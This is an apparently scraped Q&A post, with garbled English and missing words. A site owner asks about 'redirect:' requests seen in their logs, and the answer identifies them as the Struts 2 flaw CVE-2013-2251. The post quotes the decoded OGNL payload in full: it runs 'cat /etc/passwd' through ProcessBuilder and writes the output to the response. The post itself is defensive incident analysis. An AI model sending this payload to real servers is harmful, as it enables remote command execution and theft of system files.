security - Spring "redirect:" EL vulnerability? -
i have public-facing web application uses spring mvc (3.2.x) , spring security (3.1.x). morning observed requests of following form in our access logs:
get /mywebapppath/login.do?redirect:${some url-encoded el code here}
what bug or feature of spring attempting exploit? under conditions spring (or other code) evaluate el expression?
it looks ?redirect:
parameter ignored me, makes me nervous because don't know verify i'm not vulnerable. googling has turned unrelated things (as best can tell).
if code inside ${ }
had run, have attempted dump contents of /etc/passwd
client. (thankfully looks never did run. plus file doesn't exist on our system. , our tomcat runs user limited permissions.)
edit: here actual code inside ${ }
, after decoding , adding newlines readability:
#a=(new java.lang.processbuilder(new java.lang.string[]{'cat','/etc/passwd'})).start(), #b=#a.getinputstream(), #c=new java.io.inputstreamreader(#b), #d=new java.io.bufferedreader(#c), #e=new char[50000], #d.read(#e), #matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'), #matt.getwriter().println(#e), #matt.getwriter().flush(), #matt.getwriter().close()
es correcto, esta vulnerabilidad es exclusiva de struts 2, y esta documentada como cve-2013-2251. no tienes de que preocuparte con spring mvc.
that's right, vulnerability exclusive struts 2, , is documented cve-2013-2251. not have worry spring mvc.
Comments
Post a Comment